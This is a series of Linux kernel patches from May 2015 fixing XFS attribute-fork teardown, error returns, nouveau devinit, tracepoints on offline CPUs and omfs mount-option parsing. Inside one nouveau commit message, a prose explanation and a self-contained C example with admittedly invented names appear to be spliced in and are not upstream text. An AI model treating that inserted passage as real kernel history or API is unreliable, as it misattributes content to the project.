*/ -STATIC void -xfs_attr_fork_reset( +void +xfs_attr_fork_remove( struct xfs_inode *ip, struct xfs_trans *tp) { @@ -641,7 +641,7 @@ xfs_attr_shortform_remove(xfs_da_args_t *args) (mp->m_flags & XFS_MOUNT_ATTR2) && (dp->i_d.di_format != XFS_DINODE_FMT_BTREE) && !(args->op_flags & XFS_DA_OP_ADDNAME)) { - xfs_attr_fork_reset(dp, args->trans); + xfs_attr_fork_remove(dp, args->trans); } else { xfs_idata_realloc(dp, -size, XFS_ATTR_FORK); dp->i_d.di_forkoff = xfs_attr_shortform_bytesfit(dp, totsize); @@ -905,7 +905,7 @@ xfs_attr3_leaf_to_shortform( if (forkoff == -1) { ASSERT(dp->i_mount->m_flags & XFS_MOUNT_ATTR2); ASSERT(dp->i_d.di_format != XFS_DINODE_FMT_BTREE); - xfs_attr_fork_reset(dp, args->trans); + xfs_attr_fork_remove(dp, args->trans); goto out; } diff --git a/fs/xfs/libxfs/xfs_attr_leaf.h b/fs/xfs/libxfs/xfs_attr_leaf.h index 025c4b820c03..882c8d338891 100644 --- a/fs/xfs/libxfs/xfs_attr_leaf.h +++ b/fs/xfs/libxfs/xfs_attr_leaf.h @@ -53,7 +53,7 @@ int xfs_attr_shortform_remove(struct xfs_da_args *args); int xfs_attr_shortform_list(struct xfs_attr_list_context *context); int xfs_attr_shortform_allfit(struct xfs_buf *bp, struct xfs_inode *dp); int xfs_attr_shortform_bytesfit(xfs_inode_t *dp, int bytes); - +void xfs_attr_fork_remove(struct xfs_inode *ip, struct xfs_trans *tp); /* * Internal routines when attribute fork size == XFS_LBSIZE(mp). diff --git a/fs/xfs/xfs_attr_inactive.c b/fs/xfs/xfs_attr_inactive.c index f9c1c64782d3..3fbf167cfb4c 100644 --- a/fs/xfs/xfs_attr_inactive.c +++ b/fs/xfs/xfs_attr_inactive.c @@ -380,23 +380,31 @@ xfs_attr3_root_inactive( return error; } +/* + * xfs_attr_inactive kills all traces of an attribute fork on an inode. It + * removes both the on-disk and in-memory inode fork. Note that this also has to + * handle the condition of inodes without attributes but with an attribute fork + * configured, so we can't use xfs_inode_hasattr() here. + * + * The in-memory attribute fork is removed even on error. + */ int -xfs_attr_inactive(xfs_inode_t *dp) +xfs_attr_inactive( + struct xfs_inode *dp) { - xfs_trans_t *trans; - xfs_mount_t *mp; - int error; + struct xfs_trans *trans; + struct xfs_mount *mp; + int cancel_flags = 0; + int lock_mode = XFS_ILOCK_SHARED; + int error = 0; mp = dp->i_mount; ASSERT(! XFS_NOT_DQATTACHED(mp, dp)); - xfs_ilock(dp, XFS_ILOCK_SHARED); - if (!xfs_inode_hasattr(dp) || - dp->i_d.di_aformat == XFS_DINODE_FMT_LOCAL) { - xfs_iunlock(dp, XFS_ILOCK_SHARED); - return 0; - } - xfs_iunlock(dp, XFS_ILOCK_SHARED); + xfs_ilock(dp, lock_mode); + if (!XFS_IFORK_Q(dp)) + goto out_destroy_fork; + xfs_iunlock(dp, lock_mode); /* * Start our first transaction of the day. @@ -408,13 +416,18 @@ xfs_attr_inactive(xfs_inode_t *dp) * the inode in every transaction to let it float upward through * the log. */ + lock_mode = 0; trans = xfs_trans_alloc(mp, XFS_TRANS_ATTRINVAL); error = xfs_trans_reserve(trans, &M_RES(mp)->tr_attrinval, 0, 0); - if (error) { - xfs_trans_cancel(trans, 0); - return error; - } - xfs_ilock(dp, XFS_ILOCK_EXCL); + if (error) + goto out_cancel; + + lock_mode = XFS_ILOCK_EXCL; + cancel_flags = XFS_TRANS_RELEASE_LOG_RES | XFS_TRANS_ABORT; + xfs_ilock(dp, lock_mode); + + if (!XFS_IFORK_Q(dp)) + goto out_cancel; /* * No need to make quota reservations here. We expect to release some @@ -422,29 +435,31 @@ xfs_attr_inactive(xfs_inode_t *dp) */ xfs_trans_ijoin(trans, dp, 0); - /* - * Decide on what work routines to call based on the inode size. 
- */ - if (!xfs_inode_hasattr(dp) || - dp->i_d.di_aformat == XFS_DINODE_FMT_LOCAL) { - error = 0; - goto out; + /* invalidate and truncate the attribute fork extents */ + if (dp->i_d.di_aformat != XFS_DINODE_FMT_LOCAL) { + error = xfs_attr3_root_inactive(&trans, dp); + if (error) + goto out_cancel; + + error = xfs_itruncate_extents(&trans, dp, XFS_ATTR_FORK, 0); + if (error) + goto out_cancel; } - error = xfs_attr3_root_inactive(&trans, dp); - if (error) - goto out; - error = xfs_itruncate_extents(&trans, dp, XFS_ATTR_FORK, 0); - if (error) - goto out; + /* Reset the attribute fork - this also destroys the in-core fork */ + xfs_attr_fork_remove(dp, trans); error = xfs_trans_commit(trans, XFS_TRANS_RELEASE_LOG_RES); - xfs_iunlock(dp, XFS_ILOCK_EXCL); - + xfs_iunlock(dp, lock_mode); return error; -out: - xfs_trans_cancel(trans, XFS_TRANS_RELEASE_LOG_RES|XFS_TRANS_ABORT); - xfs_iunlock(dp, XFS_ILOCK_EXCL); +out_cancel: + xfs_trans_cancel(trans, cancel_flags); +out_destroy_fork: + /* kill the in-core attr fork before we drop the inode lock */ + if (dp->i_afp) + xfs_idestroy_fork(dp, XFS_ATTR_FORK); + if (lock_mode) + xfs_iunlock(dp, lock_mode); return error; } diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c index d6ebc85192b7..1117dd3ba123 100644 --- a/fs/xfs/xfs_inode.c +++ b/fs/xfs/xfs_inode.c @@ -1946,21 +1946,17 @@ xfs_inactive( /* * If there are attributes associated with the file then blow them away * now. The code calls a routine that recursively deconstructs the - * attribute fork. We need to just commit the current transaction - * because we can't use it for xfs_attr_inactive(). + * attribute fork. If also blows away the in-core attribute fork. */ - if (ip->i_d.di_anextents > 0) { - ASSERT(ip->i_d.di_forkoff != 0); - + if (XFS_IFORK_Q(ip)) { error = xfs_attr_inactive(ip); if (error) return; } - if (ip->i_afp) - xfs_idestroy_fork(ip, XFS_ATTR_FORK); - + ASSERT(!ip->i_afp); ASSERT(ip->i_d.di_anextents == 0); + ASSERT(ip->i_d.di_forkoff == 0); /* * Free the inode. From cddc116228cb9d51d3224d23ba3e61fbbc3ec3d2 Mon Sep 17 00:00:00 2001 From: Dave Chinner Date: Fri, 29 May 2015 07:40:32 +1000 Subject: [PATCH 419/872] xfs: xfs_iozero can return positive errno It was missed when we converted everything in XFs to use negative error numbers, so fix it now. Bug introduced in 3.17 by commit 2451337 ("xfs: global error sign conversion"), and should go back to stable kernels. Thanks to Brian Foster for noticing it. cc: # 3.17, 3.18, 3.19, 4.0 Signed-off-by: Dave Chinner Reviewed-by: Brian Foster Signed-off-by: Dave Chinner --- fs/xfs/xfs_file.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/xfs/xfs_file.c b/fs/xfs/xfs_file.c index 8121e75352ee..3b7591224f4a 100644 --- a/fs/xfs/xfs_file.c +++ b/fs/xfs/xfs_file.c @@ -124,7 +124,7 @@ xfs_iozero( status = 0; } while (count); - return (-status); + return status; } int From 22419ac9fe5e79483596cebdbd1d1209c18bac1a Mon Sep 17 00:00:00 2001 From: Brian Foster Date: Fri, 29 May 2015 08:14:55 +1000 Subject: [PATCH 420/872] xfs: fix broken i_nlink accounting for whiteout tmpfile inode XFS uses the internal tmpfile() infrastructure for the whiteout inode used for RENAME_WHITEOUT operations. For tmpfile inodes, XFS allocates the inode, drops di_nlink, adds the inode to the agi unlinked list, calls d_tmpfile() which correspondingly drops i_nlink of the vfs inode, and then finishes the common inode setup (e.g., clear I_NEW and unlock). 
The d_tmpfile() call was originally made in xfs_create_tmpfile(), but was pulled up out of that function as part of the following commit to resolve a deadlock issue: 330033d6 xfs: fix tmpfile/selinux deadlock and initialize security As a result, callers of xfs_create_tmpfile() are responsible for either calling d_tmpfile() or fixing up i_nlink appropriately. The whiteout tmpfile allocation helper does neither. As a result, the vfs ->i_nlink becomes inconsistent with the on-disk ->di_nlink once xfs_rename() links it back into the source dentry and calls xfs_bumplink(). Update the assert in xfs_rename() to help detect this problem in the future and update xfs_rename_alloc_whiteout() to decrement the link count as part of the manual tmpfile inode setup. Signed-off-by: Brian Foster Reviewed-by: Dave Chinner Signed-off-by: Dave Chinner --- fs/xfs/xfs_inode.c | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/fs/xfs/xfs_inode.c b/fs/xfs/xfs_inode.c index 1117dd3ba123..539a85fddbc2 100644 --- a/fs/xfs/xfs_inode.c +++ b/fs/xfs/xfs_inode.c @@ -2879,7 +2879,13 @@ xfs_rename_alloc_whiteout( if (error) return error; - /* Satisfy xfs_bumplink that this is a real tmpfile */ + /* + * Prepare the tmpfile inode as if it were created through the VFS. + * Otherwise, the link increment paths will complain about nlink 0->1. + * Drop the link count as done by d_tmpfile(), complete the inode setup + * and flag it as linkable. + */ + drop_nlink(VFS_I(tmpfile)); xfs_finish_inode_setup(tmpfile); VFS_I(tmpfile)->i_state |= I_LINKABLE; @@ -3147,7 +3153,7 @@ xfs_rename( * intermediate state on disk. */ if (wip) { - ASSERT(wip->i_d.di_nlink == 0); + ASSERT(VFS_I(wip)->i_nlink == 0 && wip->i_d.di_nlink == 0); error = xfs_bumplink(tp, wip); if (error) goto out_trans_abort; From 9ee971a0b8efbae472882b1d3e8e736f4d6e3da9 Mon Sep 17 00:00:00 2001 From: Lars Seipel Date: Thu, 21 May 2015 03:04:10 +0200 Subject: [PATCH 421/872] drm/nouveau/gr/gf100-: fix wrong constant definition Commit 3740c82590d8 ("drm/nouveau/gr/gf100-: add symbolic names for classes") introduced a wrong macro definition causing acceleration setup to fail. Fix it. Signed-off-by: Lars Seipel Fixes: 3740c82590d8 ("drm/nouveau/gr/gf100-: add symbolic names for classes") Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/include/nvif/class.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/nouveau/include/nvif/class.h b/drivers/gpu/drm/nouveau/include/nvif/class.h index 0b5af0fe8659..64f8b2f687d2 100644 --- a/drivers/gpu/drm/nouveau/include/nvif/class.h +++ b/drivers/gpu/drm/nouveau/include/nvif/class.h @@ -14,7 +14,7 @@ #define FERMI_TWOD_A 0x0000902d -#define FERMI_MEMORY_TO_MEMORY_FORMAT_A 0x0000903d +#define FERMI_MEMORY_TO_MEMORY_FORMAT_A 0x00009039 #define KEPLER_INLINE_TO_MEMORY_A 0x0000a040 #define KEPLER_INLINE_TO_MEMORY_B 0x0000a140 From c9ab50d21032ca8c5013f4d57e9aa866da78d7c7 Mon Sep 17 00:00:00 2001 From: Ben Skeggs Date: Thu, 21 May 2015 15:44:15 +1000 Subject: [PATCH 422/872] drm/nouveau/devinit/gf100: make the force-post condition more obvious And also more generic, so it can be used on newer chipsets.
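The diff below replaces a GF100-specific register poke with a check of the per-chipset engine-disable mask. As a rough illustration of that shape only - struct devinit, ENGINE_DISP and headless_board() here are invented names, not the nouveau API - a board reporting no display engine is the one that gets a forced POST:

#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

enum engine { ENGINE_GR, ENGINE_DISP, ENGINE_CE0 };

struct devinit {
	/* per-chipset hook reporting which engines the board lacks */
	uint64_t (*disable)(const struct devinit *);
	bool post;
};

static void devinit_ctor(struct devinit *di)
{
	uint64_t disabled = di->disable(di);

	/* boards without a display engine may not have been POSTed at boot,
	 * so force the devinit tables to run */
	if (disabled & (1ULL << ENGINE_DISP))
		di->post = true;
}

static uint64_t headless_board(const struct devinit *di)
{
	(void)di;
	return 1ULL << ENGINE_DISP;   /* hypothetical board without PDISP */
}

int main(void)
{
	struct devinit di = { .disable = headless_board, .post = false };

	devinit_ctor(&di);
	printf("force devinit/post: %s\n", di.post ? "yes" : "no");
	return 0;
}

Routing the decision through the chipset's disable() hook is what lets the gm107/gm204 constructors in the next patch reuse the same code path.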
Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c index e8778c67578e..9f09037731fc 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c @@ -95,7 +95,9 @@ gf100_devinit_ctor(struct nvkm_object *parent, struct nvkm_object *engine, struct nvkm_oclass *oclass, void *data, u32 size, struct nvkm_object **pobject) { + struct nvkm_devinit_impl *impl = (void *)oclass; struct nv50_devinit_priv *priv; + u64 disable; int ret; ret = nvkm_devinit_create(parent, engine, oclass, &priv); @@ -103,7 +105,8 @@ gf100_devinit_ctor(struct nvkm_object *parent, struct nvkm_object *engine, if (ret) return ret; - if (nv_rd32(priv, 0x022500) & 0x00000001) + disable = impl->disable(&priv->base); + if (disable & (1ULL << NVDEV_ENGINE_DISP)) priv->base.post = true; return 0; From 4d4d6f7520b6fce065a8b8303ace9ec48b9e96e9 Mon Sep 17 00:00:00 2001 From: Ben Skeggs Date: Thu, 21 May 2015 15:47:16 +1000 Subject: [PATCH 423/872] drm/nouveau/devinit/gm100-: force devinit table execution on boards without PDISP Should fix fdo#89558 Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c | 2 +- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c | 2 +- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c | 2 +- drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h | 3 +++ 4 files changed, 6 insertions(+), 3 deletions(-) diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c index 9f09037731fc..c61102f70805 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gf100.c @@ -90,7 +90,7 @@ gf100_devinit_disable(struct nvkm_devinit *devinit) return disable; } -static int +int gf100_devinit_ctor(struct nvkm_object *parent, struct nvkm_object *engine, struct nvkm_oclass *oclass, void *data, u32 size, struct nvkm_object **pobject) diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c index b345a53e881d..87ca0ece37b4 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm107.c @@ -48,7 +48,7 @@ struct nvkm_oclass * gm107_devinit_oclass = &(struct nvkm_devinit_impl) { .base.handle = NV_SUBDEV(DEVINIT, 0x07), .base.ofuncs = &(struct nvkm_ofuncs) { - .ctor = nv50_devinit_ctor, + .ctor = gf100_devinit_ctor, .dtor = _nvkm_devinit_dtor, .init = nv50_devinit_init, .fini = _nvkm_devinit_fini, diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c index 535172c5f1ad..1076fcf0d716 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c +++ b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/gm204.c @@ -161,7 +161,7 @@ struct nvkm_oclass * gm204_devinit_oclass = &(struct nvkm_devinit_impl) { .base.handle = NV_SUBDEV(DEVINIT, 0x07), .base.ofuncs = &(struct nvkm_ofuncs) { - .ctor = nv50_devinit_ctor, + .ctor = gf100_devinit_ctor, .dtor = _nvkm_devinit_dtor, .init = nv50_devinit_init, .fini = _nvkm_devinit_fini, diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h index b882b65ff3cd..9243521c80ac 100644 --- a/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h +++ 
b/drivers/gpu/drm/nouveau/nvkm/subdev/devinit/nv50.h @@ -15,6 +15,9 @@ int nv50_devinit_pll_set(struct nvkm_devinit *, u32, u32); int gt215_devinit_pll_set(struct nvkm_devinit *, u32, u32); +int gf100_devinit_ctor(struct nvkm_object *, struct nvkm_object *, + struct nvkm_oclass *, void *, u32, + struct nvkm_object **); int gf100_devinit_pll_set(struct nvkm_devinit *, u32, u32); u64 gm107_devinit_disable(struct nvkm_devinit *); From aaea3938b5637ffb1d77e8b7707c207b24e02937 Mon Sep 17 00:00:00 2001 From: Ben Skeggs Date: Mon, 4 May 2015 12:26:00 +1000 Subject: [PATCH 424/872] drm/nouveau/gr/gm204: remove a stray printk Signed-off-by: Ben Skeggs --- drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c | 1 - 1 file changed, 1 deletion(-) diff --git a/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c b/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c index 2f5eadd12a9b..fdb1dcf16a59 100644 --- a/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c +++ b/drivers/gpu/drm/nouveau/nvkm/engine/gr/gm204.c @@ -329,7 +329,6 @@ gm204_gr_init(struct nvkm_object *object) nv_mask(priv, 0x419cc0, 0x00000008, 0x00000008); for (gpc = 0; gpc < priv->gpc_nr; gpc++) { - printk(KERN_ERR "ppc %d %d\n", gpc, priv->ppc_nr[gpc]); for (ppc = 0; ppc < priv->ppc_nr[gpc]; ppc++) nv_wr32(priv, PPC_UNIT(gpc, ppc, 0x038), 0xc0000000); nv_wr32(priv, GPC_UNIT(gpc, 0x0420), 0xc0000000); From e5feb1ebaadfb1f5f70a3591e762d780232a4f5d Mon Sep 17 00:00:00 2001 From: "Shreyas B. Prabhu" Date: Thu, 28 May 2015 15:44:16 -0700 Subject: [PATCH 425/872] tracing/mm: don't trace kmem_cache_free on offline cpus Since tracepoints use RCU for protection, they must not be called on offline cpus. trace_kmem_cache_free can be called on an offline cpu in this scenario caught by LOCKDEP: =============================== [ INFO: suspicious RCU usage. ] 4.1.0-rc1+ #9 Not tainted ------------------------------- include/trace/events/kmem.h:148 suspicious rcu_dereference_check() usage! other info that might help us debug this: RCU used illegally from offline CPU! rcu_scheduler_active = 1, debug_locks = 1 no locks held by swapper/1/0. stack backtrace: CPU: 1 PID: 0 Comm: swapper/1 Not tainted 4.1.0-rc1+ #9 Call Trace: .dump_stack+0x98/0xd4 (unreliable) .lockdep_rcu_suspicious+0x108/0x170 .kmem_cache_free+0x344/0x4b0 .__mmdrop+0x4c/0x160 .idle_task_exit+0xf0/0x100 .pnv_smp_cpu_kill_self+0x58/0x2c0 .cpu_die+0x34/0x50 .arch_cpu_idle_dead+0x20/0x40 .cpu_startup_entry+0x708/0x7a0 .start_secondary+0x36c/0x3a0 start_secondary_prolog+0x10/0x14 Fix this by converting kmem_cache_free trace point into TRACE_EVENT_CONDITION where condition is cpu_online(smp_processor_id()) Signed-off-by: Shreyas B. Prabhu Reported-by: Aneesh Kumar K.V Reviewed-by: Preeti U Murthy Acked-by: Steven Rostedt Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- include/trace/events/kmem.h | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/include/trace/events/kmem.h b/include/trace/events/kmem.h index 81ea59812117..78efa0a197a9 100644 --- a/include/trace/events/kmem.h +++ b/include/trace/events/kmem.h @@ -140,11 +140,22 @@ DEFINE_EVENT(kmem_free, kfree, TP_ARGS(call_site, ptr) ); -DEFINE_EVENT(kmem_free, kmem_cache_free, +DEFINE_EVENT_CONDITION(kmem_free, kmem_cache_free, TP_PROTO(unsigned long call_site, const void *ptr), - TP_ARGS(call_site, ptr) + TP_ARGS(call_site, ptr), + + /* + * This trace can be potentially called from an offlined cpu. + * Since trace points use RCU and RCU should not be used from + * offline cpus, filter such calls out. 
+ * While this trace can be called from a preemptable section, + * it has no impact on the condition since tasks can migrate + * only from online cpus to other online cpus. Thus its safe + * to use raw_smp_processor_id. + */ + TP_CONDITION(cpu_online(raw_smp_processor_id())) ); TRACE_EVENT(mm_page_free, From 1f0c27b50f4f2567e649f49d77daee2bbf3f40e5 Mon Sep 17 00:00:00 2001 From: "Shreyas B. Prabhu" Date: Thu, 28 May 2015 15:44:19 -0700 Subject: [PATCH 426/872] tracing/mm: don't trace mm_page_free on offline cpus Since tracepoints use RCU for protection, they must not be called on offline cpus. trace_mm_page_free can be called on an offline cpu in this scenario caught by LOCKDEP: =============================== [ INFO: suspicious RCU usage. ] 4.1.0-rc1+ #9 Not tainted ------------------------------- include/trace/events/kmem.h:170 suspicious rcu_dereference_check() usage! other info that might help us debug this: RCU used illegally from offline CPU! rcu_scheduler_active = 1, debug_locks = 1 no locks held by swapper/1/0. stack backtrace: CPU: 1 PID: 0 Comm: swapper/1 Not tainted 4.1.0-rc1+ #9 Call Trace: .dump_stack+0x98/0xd4 (unreliable) .lockdep_rcu_suspicious+0x108/0x170 .free_pages_prepare+0x494/0x680 .free_hot_cold_page+0x50/0x280 .destroy_context+0x90/0xd0 .__mmdrop+0x58/0x160 .idle_task_exit+0xf0/0x100 .pnv_smp_cpu_kill_self+0x58/0x2c0 .cpu_die+0x34/0x50 .arch_cpu_idle_dead+0x20/0x40 .cpu_startup_entry+0x708/0x7a0 .start_secondary+0x36c/0x3a0 start_secondary_prolog+0x10/0x14 Fix this by converting mm_page_free trace point into TRACE_EVENT_CONDITION where condition is cpu_online(smp_processor_id()) Signed-off-by: Shreyas B. Prabhu Reviewed-by: Preeti U Murthy Acked-by: Steven Rostedt Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- include/trace/events/kmem.h | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/include/trace/events/kmem.h b/include/trace/events/kmem.h index 78efa0a197a9..aa863549e77a 100644 --- a/include/trace/events/kmem.h +++ b/include/trace/events/kmem.h @@ -158,12 +158,24 @@ DEFINE_EVENT_CONDITION(kmem_free, kmem_cache_free, TP_CONDITION(cpu_online(raw_smp_processor_id())) ); -TRACE_EVENT(mm_page_free, +TRACE_EVENT_CONDITION(mm_page_free, TP_PROTO(struct page *page, unsigned int order), TP_ARGS(page, order), + + /* + * This trace can be potentially called from an offlined cpu. + * Since trace points use RCU and RCU should not be used from + * offline cpus, filter such calls out. + * While this trace can be called from a preemptable section, + * it has no impact on the condition since tasks can migrate + * only from online cpus to other online cpus. Thus its safe + * to use raw_smp_processor_id. + */ + TP_CONDITION(cpu_online(raw_smp_processor_id())), + TP_STRUCT__entry( __field( unsigned long, pfn ) __field( unsigned int, order ) From 649b8de2f75145bf14cb1783688e16d51ac9b89a Mon Sep 17 00:00:00 2001 From: "Shreyas B. Prabhu" Date: Thu, 28 May 2015 15:44:22 -0700 Subject: [PATCH 427/872] tracing/mm: don't trace mm_page_pcpu_drain on offline cpus Since tracepoints use RCU for protection, they must not be called on offline cpus. trace_mm_page_pcpu_drain can be called on an offline cpu in this scenario caught by LOCKDEP: =============================== [ INFO: suspicious RCU usage. ] 4.1.0-rc1+ #9 Not tainted ------------------------------- include/trace/events/kmem.h:265 suspicious rcu_dereference_check() usage! other info that might help us debug this: RCU used illegally from offline CPU! 
rcu_scheduler_active = 1, debug_locks = 1 1 lock held by swapper/5/0: #0: (&(&zone->lock)->rlock){..-...}, at: [] .free_pcppages_bulk+0x70/0x920 stack backtrace: CPU: 5 PID: 0 Comm: swapper/5 Not tainted 4.1.0-rc1+ #9 Call Trace: .dump_stack+0x98/0xd4 (unreliable) .lockdep_rcu_suspicious+0x108/0x170 .free_pcppages_bulk+0x60c/0x920 .free_hot_cold_page+0x208/0x280 .destroy_context+0x90/0xd0 .__mmdrop+0x58/0x160 .idle_task_exit+0xf0/0x100 .pnv_smp_cpu_kill_self+0x58/0x2c0 .cpu_die+0x34/0x50 .arch_cpu_idle_dead+0x20/0x40 .cpu_startup_entry+0x708/0x7a0 .start_secondary+0x36c/0x3a0 start_secondary_prolog+0x10/0x14 Fix this by converting mm_page_pcpu_drain trace point into TRACE_EVENT_CONDITION where condition is cpu_online(smp_processor_id()) Signed-off-by: Shreyas B. Prabhu Reviewed-by: Preeti U Murthy Acked-by: Steven Rostedt Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- include/trace/events/kmem.h | 25 ++++++++++++++++++++++++- 1 file changed, 24 insertions(+), 1 deletion(-) diff --git a/include/trace/events/kmem.h b/include/trace/events/kmem.h index aa863549e77a..f7554fd7fc62 100644 --- a/include/trace/events/kmem.h +++ b/include/trace/events/kmem.h @@ -276,12 +276,35 @@ DEFINE_EVENT(mm_page, mm_page_alloc_zone_locked, TP_ARGS(page, order, migratetype) ); -DEFINE_EVENT_PRINT(mm_page, mm_page_pcpu_drain, +TRACE_EVENT_CONDITION(mm_page_pcpu_drain, TP_PROTO(struct page *page, unsigned int order, int migratetype), TP_ARGS(page, order, migratetype), + /* + * This trace can be potentially called from an offlined cpu. + * Since trace points use RCU and RCU should not be used from + * offline cpus, filter such calls out. + * While this trace can be called from a preemptable section, + * it has no impact on the condition since tasks can migrate + * only from online cpus to other online cpus. Thus its safe + * to use raw_smp_processor_id. + */ + TP_CONDITION(cpu_online(raw_smp_processor_id())), + + TP_STRUCT__entry( + __field( unsigned long, pfn ) + __field( unsigned int, order ) + __field( int, migratetype ) + ), + + TP_fast_assign( + __entry->pfn = page ? page_to_pfn(page) : -1UL; + __entry->order = order; + __entry->migratetype = migratetype; + ), + TP_printk("page=%p pfn=%lu order=%d migratetype=%d", pfn_to_page(__entry->pfn), __entry->pfn, __entry->order, __entry->migratetype) From 2b1d3ae940acd11be44c6eced5873d47c2e00ffa Mon Sep 17 00:00:00 2001 From: Andrew Morton Date: Thu, 28 May 2015 15:44:24 -0700 Subject: [PATCH 428/872] fs/binfmt_elf.c:load_elf_binary(): return -EINVAL on zero-length mappings load_elf_binary() returns `retval', not `error'. Fixes: a87938b2e246b81b4fb ("fs/binfmt_elf.c: fix bug in loading of PIE binaries") Reported-by: James Hogan Cc: Michael Davidson Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/binfmt_elf.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/binfmt_elf.c b/fs/binfmt_elf.c index 241ef68d2893..cd46e4158830 100644 --- a/fs/binfmt_elf.c +++ b/fs/binfmt_elf.c @@ -918,7 +918,7 @@ static int load_elf_binary(struct linux_binprm *bprm) total_size = total_mapping_size(elf_phdata, loc->elf_ex.e_phnum); if (!total_size) { - error = -EINVAL; + retval = -EINVAL; goto out_free_dentry; } } From cd4e6c91a114a23b0b8d61d460a2d1d14e3b45f4 Mon Sep 17 00:00:00 2001 From: Joe Perches Date: Thu, 28 May 2015 15:44:27 -0700 Subject: [PATCH 429/872] MAINTAINERS: update CAPABILITIES pattern Commit 1ddd3b4e07a4 ("LSM: Remove unused capability.c") removed the file, remove the file pattern. 
Signed-off-by: Joe Perches Acked-by: Casey Schaufler Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- MAINTAINERS | 1 - 1 file changed, 1 deletion(-) diff --git a/MAINTAINERS b/MAINTAINERS index 474bcb6c0bac..af802b357b6a 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -2427,7 +2427,6 @@ L: linux-security-module@vger.kernel.org S: Supported F: include/linux/capability.h F: include/uapi/linux/capability.h -F: security/capability.c F: security/commoncap.c F: kernel/capability.c From dcbff39da3d815f08750552fdd04f96b51751129 Mon Sep 17 00:00:00 2001 From: Sasha Levin Date: Thu, 28 May 2015 15:44:29 -0700 Subject: [PATCH 430/872] fs, omfs: add NULL terminator at the end of the token list match_token() expects a NULL terminator at the end of the token list so that it would know where to stop. Not having one causes it to overrun to invalid memory. In practice, passing a mount option that omfs didn't recognize would sometimes panic the system. Signed-off-by: Sasha Levin Signed-off-by: Bob Copeland Cc: Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/inode.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/fs/omfs/inode.c b/fs/omfs/inode.c index 138321b0c6c2..70d4191cf33d 100644 --- a/fs/omfs/inode.c +++ b/fs/omfs/inode.c @@ -359,7 +359,7 @@ static int omfs_get_imap(struct super_block *sb) } enum { - Opt_uid, Opt_gid, Opt_umask, Opt_dmask, Opt_fmask + Opt_uid, Opt_gid, Opt_umask, Opt_dmask, Opt_fmask, Opt_err }; static const match_table_t tokens = { @@ -368,6 +368,7 @@ static const match_table_t tokens = { {Opt_umask, "umask=%o"}, {Opt_dmask, "dmask=%o"}, {Opt_fmask, "fmask=%o"}, + {Opt_err, NULL}, }; static int parse_options(char *options, struct omfs_sb_info *sbi) From 3a281f946640542a7a7372f436e101ee1fbc4c97 Mon Sep 17 00:00:00 2001 From: Bob Copeland Date: Thu, 28 May 2015 15:44:32 -0700 Subject: [PATCH 431/872] omfs: set error return when d_make_root() fails A static checker found the following issue in the error path for omfs_fill_super: fs/omfs/inode.c:552 omfs_fill_super() warn: missing error code here? 'd_make_root()' failed. 'ret' = '0' Fix by returning -ENOMEM in this case. Signed-off-by: Bob Copeland Reported-by: Dan Carpenter Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds --- fs/omfs/inode.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/fs/omfs/inode.c b/fs/omfs/inode.c index 70d4191cf33d..6ce542c11f98 100644 --- a/fs/omfs/inode.c +++ b/fs/omfs/inode.c @@ -549,8 +549,10 @@ static int omfs_fill_super(struct super_block *sb, void *data, int silent) } sb->s_root = d_make_root(root); - if (!sb->s_root) + if (!sb->s_root) { + ret = -ENOMEM; goto out_brelse_bh2; + } printk(KERN_DEBUG 